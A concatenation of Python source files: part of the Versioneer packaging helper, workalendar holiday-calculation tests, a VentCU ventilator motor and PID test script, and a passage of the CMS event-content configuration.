cmds["build_exe"] = cmd_build_exe del cmds["build_py"] # we override different "sdist" commands for both environments if "setuptools" in sys.modules: from setuptools.command.sdist import sdist as _sdist else: from distutils.command.sdist import sdist as _sdist class cmd_sdist(_sdist): def run(self): versions = get_versions() self._versioneer_generated_versions = versions # unless we update this, the command will keep using the old # version self.distribution.metadata.version = versions["version"] return _sdist.run(self) def make_release_tree(self, base_dir, files): root = get_root() cfg = get_config_from_root(root) _sdist.make_release_tree(self, base_dir, files) # now locate _version.py in the new base_dir directory # (remembering that it may be a hardlink) and replace it with an # updated value target_versionfile = os.path.join(base_dir, cfg.versionfile_source) print("UPDATING %s" % target_versionfile) write_to_version_file(target_versionfile, self._versioneer_generated_versions) cmds["sdist"] = cmd_sdist return cmds CONFIG_ERROR = """ setup.cfg is missing the necessary Versioneer configuration. You need a section like: [versioneer] VCS = git style = pep440 versionfile_source = src/myproject/_version.py versionfile_build = myproject/_version.py tag_prefix = parentdir_prefix = myproject- You will also need to edit your setup.py to use the results: import versioneer setup(version=versioneer.get_version(), cmdclass=versioneer.get_cmdclass(), ...) Please read the docstring in ./versioneer.py for configuration instructions, edit setup.cfg, and re-run the installer or 'python versioneer.py setup'. """ SAMPLE_CONFIG = """ # See the docstring in versioneer.py for instructions. Note that you must # re-run 'versioneer.py setup' after changing this section, and commit the # resulting files. [versioneer] #VCS = git #style = pep440 #versionfile_source = #versionfile_build = #tag_prefix = #parentdir_prefix = """ INIT_PY_SNIPPET = """ from ._version import get_versions __version__ = get_versions()['version'] del get_versions """ def do_setup(): """Main VCS-independent setup function for installing Versioneer.""" root = get_root() try: cfg = get_config_from_root(root) except (EnvironmentError, configparser.NoSectionError, configparser.NoOptionError) as e: if isinstance(e, (EnvironmentError, configparser.NoSectionError)): print("Adding sample versioneer config to setup.cfg", file=sys.stderr) with open(os.path.join(root, "setup.cfg"), "a") as f: f.write(SAMPLE_CONFIG) print(CONFIG_ERROR, file=sys.stderr) return 1 print(" creating %s" % cfg.versionfile_source) with open(cfg.versionfile_source, "w") as f: LONG = LONG_VERSION_PY[cfg.VCS] f.write(LONG % {"DOLLAR": "$", "STYLE": cfg.style, "TAG_PREFIX": cfg.tag_prefix, "PARENTDIR_PREFIX": cfg.parentdir_prefix, "VERSIONFILE_SOURCE": cfg.versionfile_source, }) ipy = os.path.join(os.path.dirname(cfg.versionfile_source), "__init__.py") if os.path.exists(ipy): try: with open(ipy, "r") as f: old = f.read() except EnvironmentError: old = "" if INIT_PY_SNIPPET not in old: print(" appending to %s" % ipy) with open(ipy, "a") as f: f.write(INIT_PY_SNIPPET) else: print(" %s unmodified" % ipy) else: print(" %s doesn't exist, ok" % ipy) ipy = None # Make sure both the top-level "versioneer.py" and versionfile_source # (PKG/_version.py, used by runtime code) are in MANIFEST.in, so # they'll be copied into source distributions. Pip won't be able to # install the package without this. manifest_in = os.path.join(root, "MANIFEST.in") simple_includes = set() try: with open(manifest_in, "r") as f: for line in f: if line.startswith("include "): for include in line.split()[1:]: simple_includes.add(include) except EnvironmentError: pass # That doesn't cover everything MANIFEST.in can do # (http://docs.python.org/2/distutils/sourcedist.html#commands), so # it might give some false negatives. Appending redundant 'include' # lines is safe, though. if "versioneer.py" not in simple_includes: print(" appending 'versioneer.py' to MANIFEST.in") with open(manifest_in, "a") as f: f.write("include versioneer.py\n") else: print(" 'versioneer.py' already in MANIFEST.in") if cfg.versionfile_source not in simple_includes: print(" appending versionfile_source ('%s') to MANIFEST.in" % cfg.versionfile_source) with open(manifest_in, "a") as f: f.write("include %s\n" % cfg.versionfile_source) else: print(" versionfile_source already in MANIFEST.in") # Make VCS-specific changes. For git, this means creating/changing # .gitattributes to mark _version.py for export-time keyword # substitution. do_vcs_install(manifest_in, cfg.versionfile_source, ipy) return 0 def scan_setup_py(): """Validate the contents of setup.py against Versioneer's expectations.""" found = set() setters = False errors = 0 with open("setup.py", "r") as f: for line in f.readlines(): if "import versioneer" in line: found.add("import") if "versioneer.get_cmdclass()" in line: found.add("cmdclass") if "versioneer.get_version()" in line: found.add("get_version") if "versioneer.VCS" in line: setters = True if "versioneer.versionfile_source" in line: setters = True if len(found) != 3: print("") print("Your setup.py appears to be missing some important items") print("(but I might be wrong). Please make sure it has something") print("roughly like the following:") print("") print(" import versioneer") print(" setup( version=versioneer.get_version(),") print(" cmdclass=versioneer.get_cmdclass(), ...)") print("") errors += 1 if setters: print("You should remove lines like 'versioneer.VCS = ' and") print("'versioneer.versionfile_source = ' . This configuration") print("now lives in setup.cfg, and should be removed from setup.py") print("") errors += 1 return errors if __name__ == "__main__": cmd = sys.argv[1] if cmd == "setup": errors = do_setup() errors += scan_setup_py() if errors: sys.exit(1)
py
7dfa1d6607b3edcebc2001b920940783efdd0057
from datetime import date from datetime import datetime from workalendar.tests import GenericCalendarTest from workalendar.core import MON, TUE, THU, FRI from workalendar.core import Calendar, LunarCalendar, WesternCalendar from workalendar.core import IslamicMixin, JalaliMixin, ChristianMixin from workalendar.core import EphemMixin class CalendarTest(GenericCalendarTest): def test_private_variables(self): self.assertTrue(hasattr(self.cal, '_holidays')) private_holidays = self.cal._holidays self.assertTrue(isinstance(private_holidays, dict)) self.cal.holidays(2011) self.cal.holidays(2012) private_holidays = self.cal._holidays self.assertTrue(isinstance(private_holidays, dict)) self.assertIn(2011, self.cal._holidays) self.assertIn(2012, self.cal._holidays) def test_year(self): holidays = self.cal.holidays() self.assertTrue(isinstance(holidays, (tuple, list))) self.assertEquals(self.cal._holidays[self.year], holidays) def test_another_year(self): holidays = self.cal.holidays(2011) self.assertTrue(isinstance(holidays, (tuple, list))) self.assertEquals(self.cal._holidays[2011], holidays) def test_is_working_day(self): self.assertRaises( NotImplementedError, self.cal.is_working_day, date(2012, 1, 1)) def test_nth_weekday(self): # first monday in january 2013 self.assertEquals( Calendar.get_nth_weekday_in_month(2013, 1, MON), date(2013, 1, 7) ) # second monday in january 2013 self.assertEquals( Calendar.get_nth_weekday_in_month(2013, 1, MON, 2), date(2013, 1, 14) ) # let's test the limits # Jan 1st is a TUE self.assertEquals( Calendar.get_nth_weekday_in_month(2013, 1, TUE), date(2013, 1, 1) ) # There's no 6th MONday self.assertEquals( Calendar.get_nth_weekday_in_month(2013, 1, MON, 6), None ) def test_nth_weekday_start(self): # first thursday after 18th april start = date(2013, 4, 18) self.assertEquals( Calendar.get_nth_weekday_in_month(2013, 4, THU, start=start), date(2013, 4, 18) ) # first friday after 18th april start = date(2013, 4, 18) self.assertEquals( Calendar.get_nth_weekday_in_month(2013, 4, FRI, start=start), date(2013, 4, 19) ) def test_last_weekday(self): # last monday in january 2013 self.assertEquals( Calendar.get_last_weekday_in_month(2013, 1, MON), date(2013, 1, 28) ) # last thursday self.assertEquals( Calendar.get_last_weekday_in_month(2013, 1, THU), date(2013, 1, 31) ) class LunarCalendarTest(GenericCalendarTest): cal_class = LunarCalendar def test_new_year(self): self.assertEquals( self.cal.lunar(2014, 1, 1), date(2014, 1, 31) ) class MockCalendar(Calendar): def holidays(self, year=None): return tuple(( (date(year, 12, 25), 'Christmas'), (date(year, 1, 1), 'New year'), )) def get_weekend_days(self): return [] # no week-end, yes, it's sad class MockCalendarTest(GenericCalendarTest): cal_class = MockCalendar def test_holidays_set(self): self.assertIn( date(self.year, 12, 25), self.cal.holidays_set(self.year)) self.assertIn( date(self.year, 1, 1), self.cal.holidays_set(self.year)) def test_sorted_dates(self): holidays = list(self.cal.holidays(self.year)) day, label = holidays.pop() for next_day, label in holidays: self.assertTrue(day <= next_day) day = next_day def test_add_workingdays_simple(self): # day is out of non-working-day self.assertEquals( self.cal.add_working_days(date(self.year, 12, 20), 0), date(self.year, 12, 20) ) self.assertEquals( self.cal.add_working_days(date(self.year, 12, 20), 1), date(self.year, 12, 21) ) def test_add_workingdays_on_holiday(self): # day is in holidays self.assertEquals( self.cal.add_working_days(date(self.year, 12, 25), 0), date(self.year, 12, 25) ) self.assertEquals( self.cal.add_working_days(date(self.year, 12, 24), 1), date(self.year, 12, 26) ) self.assertEquals( self.cal.add_working_days(date(self.year, 12, 24), 2), date(self.year, 12, 27) ) def test_add_workingdays_span(self): day = date(self.year, 12, 20) # since this calendar has no weekends, we'll just have a 2-day-shift self.assertEquals( self.cal.add_working_days(day, 20), date(self.year + 1, 1, 11) ) def test_add_working_days_exceptions(self): day = date(self.year, 12, 20) christmas = date(self.year, 12, 25) boxing = date(self.year, 12, 26) # exceptional workday self.assertEquals( self.cal.add_working_days(day, 20, extra_working_days=[christmas]), date(self.year + 1, 1, 10) ) # exceptional holiday + exceptional workday self.assertEquals( self.cal.add_working_days(day, 20, extra_working_days=[christmas], extra_holidays=[boxing]), date(self.year + 1, 1, 11) ) def test_add_exceptions(self): december_20th = date(self.year, 12, 20) christmas = date(self.year, 12, 25) # target_working_day *is* a working day target_working_day = self.cal.add_working_days(december_20th, 1) # Add extra working days extra_working_days = [christmas] # add extra holidays extra_holidays = [target_working_day] self.assertFalse(self.cal.is_working_day(christmas)) self.assertTrue( self.cal.is_working_day(christmas, extra_working_days=extra_working_days)) self.assertTrue(self.cal.is_working_day(target_working_day)) self.assertFalse( self.cal.is_working_day(target_working_day, extra_holidays=extra_holidays)) # test is_holiday self.assertTrue(self.cal.is_holiday(christmas)) def test_datetime(self): self.assertFalse( self.cal.is_working_day(datetime(2014, 1, 1))) class IslamicMixinTest(GenericCalendarTest): cal_class = IslamicMixin def test_year_conversion(self): days = self.cal.converted(2013) self.assertEquals(len(days), 365) class JalaliMixinTest(GenericCalendarTest): cal_class = JalaliMixin def test_year_conversion(self): days = self.cal.converted(2013) self.assertEquals(len(days), 365) class EphemMixinTest(GenericCalendarTest): cal_class = EphemMixin def test_calculate_some_equinoxes(self): self.assertEquals( self.cal.calculate_equinoxes(2010), (date(2010, 3, 20), date(2010, 9, 23)) ) self.assertEquals( self.cal.calculate_equinoxes(2010, 'Asia/Taipei'), (date(2010, 3, 21), date(2010, 9, 23)) ) self.assertEquals( self.cal.calculate_equinoxes(2013), (date(2013, 3, 20), date(2013, 9, 22)) ) self.assertEquals( self.cal.calculate_equinoxes(2014), (date(2014, 3, 20), date(2014, 9, 23)) ) self.assertEquals( self.cal.calculate_equinoxes(2020), (date(2020, 3, 20), date(2020, 9, 22)) ) def test_qingming_festivals(self): self.assertEquals( self.cal.solar_term(2001, 15), date(2001, 4, 4) ) self.assertEquals( self.cal.solar_term(2001, 15, 'Asia/Taipei'), date(2001, 4, 5) ) self.assertEquals( self.cal.solar_term(2011, 15), date(2011, 4, 5) ) self.assertEquals( self.cal.solar_term(2014, 15), date(2014, 4, 4) ) class MockChristianCalendar(WesternCalendar, ChristianMixin): pass class MockChristianCalendarTest(GenericCalendarTest): cal_class = MockChristianCalendar def test_year_2014(self): holidays = self.cal.holidays_set(2014) self.assertNotIn(date(2014, 1, 6), holidays) # Epiphany self.assertNotIn(date(2014, 3, 3), holidays) # Clean Monday self.assertNotIn(date(2014, 3, 5), holidays) # Ash Wednesday self.assertNotIn(date(2014, 3, 25), holidays) # Annunciation self.assertNotIn(date(2014, 4, 17), holidays) # Holy Thursday self.assertNotIn(date(2014, 4, 18), holidays) # 'Good Friday self.assertNotIn(date(2014, 4, 19), holidays) # Easter sat self.assertNotIn(date(2014, 4, 20), holidays) # Easter Sun self.assertNotIn(date(2014, 4, 21), holidays) # Easter Mon self.assertNotIn(date(2014, 5, 29), holidays) # Ascension self.assertNotIn(date(2014, 6, 8), holidays) # Whit Sunday self.assertNotIn(date(2014, 6, 9), holidays) # Whit Monday self.assertNotIn(date(2014, 6, 19), holidays) # Corp. Christi self.assertNotIn(date(2014, 8, 15), holidays) # Assumption self.assertNotIn(date(2014, 11, 1), holidays) # All Saints self.assertNotIn(date(2014, 12, 8), holidays) # Imm. Conc. self.assertNotIn(date(2014, 12, 24), holidays) # Xmas Eve self.assertNotIn(date(2014, 12, 26), holidays) # Boxing Day # The only Christian day that is a holiday for every calendar self.assertIn(date(2014, 12, 25), holidays) # XMas # Only 2 days: Jan 1st and Christmas self.assertEquals(len(holidays), 2)
py
7dfa1e52620b52ed450794077116af9e1ba29019
#!/usr/bin/python # # TicDevice and PID test # VentCU - An open source ventilator # # (c) VentCU, 2020. All Rights Reserved. # from time import sleep from actuators.pid_controller import PID from actuators.tic_usb import * import pigpio from sensors.rotary_encoder import RotaryEncoder # define some global vars encoder_value = 0 # create a motor controller object ticdev = TicDevice() ticdev.open(vendor=0x1ffb, product_id=0x00CB) # create the encoder object pi = pigpio.pi() encoder = RotaryEncoder(pi, 18, 16) # create the PID controller pid = PID(P=100, D=12.0, I=0) encoder_u_limit = 400 encoder_l_limit = 0 pid.setpoint = encoder_u_limit if __name__ == "__main__": while True: encoder_value = encoder.value() pid.update(encoder_value) value = pid.output * 15000.0 if pid.output < 1000000 else 100000 ticdev.get_variables() motor_pose = ticdev.variables['current_position'] ticdev.set_target_velocity(int(value)) print("{}, {}, {}".format(int(value), encoder_value, motor_pose)) if encoder_value == encoder_u_limit and value == 0: # print("updating setpoint") sleep(1.5) pid.setpoint = encoder_l_limit elif encoder_value == encoder_l_limit and value == 0: # print("updating setpoint") sleep(1.5) pid.setpoint = encoder_u_limit ticdev.halt_and_hold() encoder.cancel() pi.stop() exit()
py
7dfa1fc2efe9a4194c19a210b71d2f742dc286e3
import FWCore.ParameterSet.Config as cms # # Event Content definition # # Data Tiers defined: # # LHE: # include pure LHE production # # RAW , RECO, AOD: # include reconstruction content # # RAWSIM, RECOSIM, AODSIM: # include reconstruction and simulation # # GENRAW # slimmed-down version of RAWSIM for small transient disk size during MC production, contains Gen+Rawdata # # PREMIX # contains special Digi collection(s) for pre-mixing minbias events for pileup simulation # Raw2Digi step is done on this file. # # PREMIXRAW # extension of RAWSIM for output of second stage of PreMixing using the DataMixer. # # RAWDEBUG(RAWSIM+ALL_SIM_INFO), RAWDEBUGHLT(RAWDEBUG+HLTDEBUG) # # RAWSIMHLT (RAWSIM + HLTDEBUG) # # RAWRECOSIMHLT, RAWRECODEBUGHLT # # FEVT (RAW+RECO), FEVTSIM (RAWSIM+RECOSIM), FEVTDEBUG (FEVTSIM+ALL_SIM_INFO), FEVTDEBUGHLT (FEVTDEBUG+HLTDEBUG) # # $Id: EventContent_cff.py,v 1.54 2013/05/01 15:44:29 mikeh Exp $ # # # # # Recontruction Systems # # from RecoLocalTracker.Configuration.RecoLocalTracker_EventContent_cff import * from RecoLocalMuon.Configuration.RecoLocalMuon_EventContent_cff import * from RecoLocalCalo.Configuration.RecoLocalCalo_EventContent_cff import * from RecoEcal.Configuration.RecoEcal_EventContent_cff import * from TrackingTools.Configuration.TrackingTools_EventContent_cff import * from RecoTracker.Configuration.RecoTracker_EventContent_cff import * from RecoJets.Configuration.RecoJets_EventContent_cff import * from RecoMET.Configuration.RecoMET_EventContent_cff import * from RecoMuon.Configuration.RecoMuon_EventContent_cff import * from RecoBTau.Configuration.RecoBTau_EventContent_cff import * from RecoBTag.Configuration.RecoBTag_EventContent_cff import * from RecoTauTag.Configuration.RecoTauTag_EventContent_cff import * from RecoVertex.Configuration.RecoVertex_EventContent_cff import * from RecoPixelVertexing.Configuration.RecoPixelVertexing_EventContent_cff import * from RecoEgamma.Configuration.RecoEgamma_EventContent_cff import * from RecoParticleFlow.Configuration.RecoParticleFlow_EventContent_cff import * from L1Trigger.Configuration.L1Trigger_EventContent_cff import * from RecoVertex.BeamSpotProducer.BeamSpot_EventContent_cff import * from CommonTools.ParticleFlow.EITopPAG_EventContent_cff import EITopPAGEventContent from RecoPPS.Configuration.RecoCTPPS_EventContent_cff import * # raw2digi that are already the final RECO/AOD products from EventFilter.ScalersRawToDigi.Scalers_EventContent_cff import * from EventFilter.OnlineMetaDataRawToDigi.OnlineMetaData_EventContent_cff import * from EventFilter.Utilities.Tcds_EventContent_cff import * #DigiToRaw content from EventFilter.Configuration.DigiToRaw_EventContent_cff import * # # # Simulation Systems # # from GeneratorInterface.Configuration.GeneratorInterface_EventContent_cff import * from SimG4Core.Configuration.SimG4Core_EventContent_cff import * from SimTracker.Configuration.SimTracker_EventContent_cff import * from SimMuon.Configuration.SimMuon_EventContent_cff import * from SimCalorimetry.Configuration.SimCalorimetry_EventContent_cff import * from SimFastTiming.Configuration.SimFastTiming_EventContent_cff import * from SimGeneral.Configuration.SimGeneral_EventContent_cff import * from IOMC.RandomEngine.IOMC_EventContent_cff import * # # # HLT # # from HLTrigger.Configuration.HLTrigger_EventContent_cff import * # # # DQM # # from DQMOffline.Configuration.DQMOffline_EventContent_cff import * # # # NANOAOD # # from PhysicsTools.NanoAOD.NanoAODEDMEventContent_cff import * # # # FastSim # # from FastSimulation.Configuration.EventContent_cff import FASTPUEventContent import FastSimulation.Configuration.EventContent_cff as fastSimEC from Configuration.Eras.Modifier_fastSim_cff import fastSim fastSim.toModify(RecoLocalTrackerRECO, outputCommands = fastSimEC.RecoLocalTracker.outputCommands) fastSim.toModify(RecoLocalTrackerFEVT, outputCommands = fastSimEC.RecoLocalTracker.outputCommands) fastSim.toReplaceWith(SimG4CoreRAW, fastSimEC.SimRAW) fastSim.toReplaceWith(SimG4CoreRECO, fastSimEC.SimRECO) # # # Top level additional keep statements # # CommonEventContent = cms.PSet( outputCommands = cms.untracked.vstring('keep *_logErrorHarvester_*_*') ) # # # LHE Data Tier definition # # LHEEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # RAW Data Tier definition # # RAWEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *', 'keep FEDRawDataCollection_rawDataCollector_*_*', 'keep FEDRawDataCollection_source_*_*'), splitLevel = cms.untracked.int32(0), compressionAlgorithm=cms.untracked.string("LZMA"), compressionLevel=cms.untracked.int32(4) ) # # # RECO Data Tier definition # # RECOEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # RAWRECO Data Tier definition # # RAWRECOEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # AOD Data Tier definition # # AODEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), eventAutoFlushCompressedSize=cms.untracked.int32(30*1024*1024), compressionAlgorithm=cms.untracked.string("LZMA"), compressionLevel=cms.untracked.int32(4) ) # # # RAWAOD Data Tier definition # # RAWAODEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), eventAutoFlushCompressedSize=cms.untracked.int32(30*1024*1024), compressionAlgorithm=cms.untracked.string("LZMA"), compressionLevel=cms.untracked.int32(4) ) # # # RAWSIM Data Tier definition # =========================== # # Here, we sacrifice memory and CPU time to decrease the on-disk size as # much as possible. Given the current per-event GEN-SIM and DIGI-RECO times, # the extra CPU time for LZMA compression works out to be ~1%. The GEN-SIM # use case of reading a minbias event for `classic pileup` has a similar CPU # impact. # The memory increase appears to be closer to 50MB - but that should be # acceptable as the introduction of multithreaded processing has bought us some # breathing room. # RAWSIMEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), eventAutoFlushCompressedSize=cms.untracked.int32(20*1024*1024), compressionAlgorithm=cms.untracked.string("LZMA"), compressionLevel=cms.untracked.int32(1) ) # # # RAWSIMHLT Data Tier definition # # RAWSIMHLTEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # RAWRECOSIMHLT Data Tier definition # # RAWRECOSIMHLTEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # RAWRECODEBUGHLT Data Tier definition # # RAWRECODEBUGHLTEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # RECOSIM Data Tier definition # # RECOSIMEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # GENRAW Data Tier definition # # GENRAWEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # AODSIM Data Tier definition # # AODSIMEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), eventAutoFlushCompressedSize=cms.untracked.int32(30*1024*1024), compressionAlgorithm=cms.untracked.string("LZMA"), compressionLevel=cms.untracked.int32(4), ) # # # FEVT Data Tier definition # # FEVTEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) FEVTHLTALLEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # FEVTSIM Data Tier definition # # FEVTSIMEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # RAWDEBUG Data Tier definition # # RAWDEBUGEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # RAWDEBUGHLT Data Tier definition # # RAWDEBUGHLTEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # FEVTDEBUG Data Tier definition # # FEVTDEBUGEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # FEVTDEBUGHLT Data Tier definition # # FEVTDEBUGHLTEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # # RECOSIMDEBUG Data Tier definition # # RECODEBUGEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # ## HLTDEBUG tier definition # HLTDEBUGEventContent = cms.PSet( #outputCommands = cms.untracked.vstring('drop *', # 'keep *_hlt*_*_*') outputCommands = cms.untracked.vstring('drop *', 'keep *_logErrorHarvester_*_*'), splitLevel = cms.untracked.int32(0), ) # # ## DQM event content # # DQMEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *', 'keep *_MEtoEDMConverter_*_*'), splitLevel = cms.untracked.int32(0) ) #Special Event Content for MixingModule and DataMixer DATAMIXEREventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *', 'keep CSCDetIdCSCALCTDigiMuonDigiCollection_muonCSCDigis_MuonCSCALCTDigi_*', 'keep CSCDetIdCSCCLCTDigiMuonDigiCollection_muonCSCDigis_MuonCSCCLCTDigi_*', 'keep CSCDetIdCSCComparatorDigiMuonDigiCollection_muonCSCDigis_MuonCSCComparatorDigi_*', 'keep CSCDetIdCSCCorrelatedLCTDigiMuonDigiCollection_csctfDigis_*_*', 'keep CSCDetIdCSCCorrelatedLCTDigiMuonDigiCollection_muonCSCDigis_MuonCSCCorrelatedLCTDigi_*', 'keep CSCDetIdCSCRPCDigiMuonDigiCollection_muonCSCDigis_MuonCSCRPCDigi_*', 'keep CSCDetIdCSCStripDigiMuonDigiCollection_muonCSCDigis_MuonCSCStripDigi_*', 'keep CSCDetIdCSCWireDigiMuonDigiCollection_muonCSCDigis_MuonCSCWireDigi_*', 'keep DTLayerIdDTDigiMuonDigiCollection_muonDTDigis_*_*', 'keep PixelDigiedmDetSetVector_siPixelDigis_*_*', 'keep SiStripDigiedmDetSetVector_siStripDigis_*_*', 'keep RPCDetIdRPCDigiMuonDigiCollection_muonRPCDigis_*_*', 'keep HBHEDataFramesSorted_hcalDigis_*_*', 'keep HFDataFramesSorted_hcalDigis_*_*', 'keep HODataFramesSorted_hcalDigis_*_*', 'keep QIE10DataFrameHcalDataFrameContainer_hcalDigis_*_*', 'keep QIE11DataFrameHcalDataFrameContainer_hcalDigis_*_*', 'keep ZDCDataFramesSorted_hcalDigis_*_*', 'keep CastorDataFramesSorted_castorDigis_*_*', 'keep EBDigiCollection_ecalDigis_*_*', 'keep EEDigiCollection_ecalDigis_*_*', 'keep ESDigiCollection_ecalPreshowerDigis_*_*'), splitLevel = cms.untracked.int32(0), ) PREMIXEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) MIXINGMODULEEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *', 'keep *_cfWriter_*_*'), splitLevel = cms.untracked.int32(0), ) # PREMIXRAW Data Tier definition # # PREMIXRAWEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), splitLevel = cms.untracked.int32(0), ) # # ## RAW repacked event content definition # # REPACKRAWEventContent = cms.PSet( outputCommands = cms.untracked.vstring( 'drop *', 'drop FEDRawDataCollection_*_*_*', 'keep FEDRawDataCollection_rawDataRepacker_*_*', 'keep FEDRawDataCollection_virginRawDataRepacker_*_*', 'keep FEDRawDataCollection_rawDataReducedFormat_*_*'), splitLevel = cms.untracked.int32(0), ) REPACKRAWSIMEventContent = cms.PSet( outputCommands = cms.untracked.vstring(), splitLevel = cms.untracked.int32(0), ) LHEEventContent.outputCommands.extend(GeneratorInterfaceLHE.outputCommands) HLTDEBUGEventContent.outputCommands.extend(HLTDebugFEVT.outputCommands) RAWEventContent.outputCommands.extend(L1TriggerRAW.outputCommands) RAWEventContent.outputCommands.extend(HLTriggerRAW.outputCommands) REPACKRAWEventContent.outputCommands.extend(L1TriggerRAW.outputCommands) REPACKRAWEventContent.outputCommands.extend(HLTriggerRAW.outputCommands) RECOEventContent.outputCommands.extend(RecoLocalTrackerRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoLocalMuonRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoLocalCaloRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoEcalRECO.outputCommands) RECOEventContent.outputCommands.extend(TrackingToolsRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoTrackerRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoJetsRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoMETRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoMuonRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoBTauRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoBTagRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoTauTagRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoVertexRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoEgammaRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoPixelVertexingRECO.outputCommands) RECOEventContent.outputCommands.extend(RecoParticleFlowRECO.outputCommands) RECOEventContent.outputCommands.extend(BeamSpotRECO.outputCommands) RECOEventContent.outputCommands.extend(L1TriggerRECO.outputCommands) RECOEventContent.outputCommands.extend(HLTriggerRECO.outputCommands) RECOEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands) RECOEventContent.outputCommands.extend(EvtScalersRECO.outputCommands) RECOEventContent.outputCommands.extend(OnlineMetaDataContent.outputCommands) RECOEventContent.outputCommands.extend(TcdsEventContent.outputCommands) RECOEventContent.outputCommands.extend(CommonEventContent.outputCommands) RECOEventContent.outputCommands.extend(EITopPAGEventContent.outputCommands) from Configuration.Eras.Modifier_ctpps_2016_cff import ctpps_2016 ctpps_2016.toModify(RECOEventContent, outputCommands = RECOEventContent.outputCommands + RecoCTPPSRECO.outputCommands) RAWRECOEventContent.outputCommands.extend(RECOEventContent.outputCommands) RAWRECOEventContent.outputCommands.extend(cms.untracked.vstring( 'keep FEDRawDataCollection_rawDataCollector_*_*', 'keep FEDRawDataCollection_source_*_*' )) AODEventContent.outputCommands.extend(RecoLocalTrackerAOD.outputCommands) AODEventContent.outputCommands.extend(RecoLocalMuonAOD.outputCommands) AODEventContent.outputCommands.extend(RecoLocalCaloAOD.outputCommands) AODEventContent.outputCommands.extend(RecoEcalAOD.outputCommands) AODEventContent.outputCommands.extend(TrackingToolsAOD.outputCommands) AODEventContent.outputCommands.extend(RecoTrackerAOD.outputCommands) AODEventContent.outputCommands.extend(RecoJetsAOD.outputCommands) AODEventContent.outputCommands.extend(RecoMETAOD.outputCommands) AODEventContent.outputCommands.extend(RecoMuonAOD.outputCommands) AODEventContent.outputCommands.extend(RecoBTauAOD.outputCommands) AODEventContent.outputCommands.extend(RecoBTagAOD.outputCommands) AODEventContent.outputCommands.extend(RecoTauTagAOD.outputCommands) AODEventContent.outputCommands.extend(RecoVertexAOD.outputCommands) AODEventContent.outputCommands.extend(RecoEgammaAOD.outputCommands) AODEventContent.outputCommands.extend(RecoParticleFlowAOD.outputCommands) AODEventContent.outputCommands.extend(BeamSpotAOD.outputCommands) AODEventContent.outputCommands.extend(L1TriggerAOD.outputCommands) AODEventContent.outputCommands.extend(HLTriggerAOD.outputCommands) AODEventContent.outputCommands.extend(MEtoEDMConverterAOD.outputCommands) AODEventContent.outputCommands.extend(EvtScalersAOD.outputCommands) AODEventContent.outputCommands.extend(OnlineMetaDataContent.outputCommands) AODEventContent.outputCommands.extend(TcdsEventContent.outputCommands) AODEventContent.outputCommands.extend(CommonEventContent.outputCommands) ctpps_2016.toModify(AODEventContent, outputCommands = AODEventContent.outputCommands + RecoCTPPSAOD.outputCommands) RAWAODEventContent.outputCommands.extend(AODEventContent.outputCommands) RAWAODEventContent.outputCommands.extend(cms.untracked.vstring( 'keep FEDRawDataCollection_rawDataCollector_*_*', 'keep FEDRawDataCollection_source_*_*' )) RAWSIMEventContent.outputCommands.extend(RAWEventContent.outputCommands) RAWSIMEventContent.outputCommands.extend(SimG4CoreRAW.outputCommands) RAWSIMEventContent.outputCommands.extend(SimTrackerRAW.outputCommands) RAWSIMEventContent.outputCommands.extend(SimMuonRAW.outputCommands) RAWSIMEventContent.outputCommands.extend(SimCalorimetryRAW.outputCommands) RAWSIMEventContent.outputCommands.extend(SimFastTimingRAW.outputCommands) RAWSIMEventContent.outputCommands.extend(SimGeneralRAW.outputCommands) 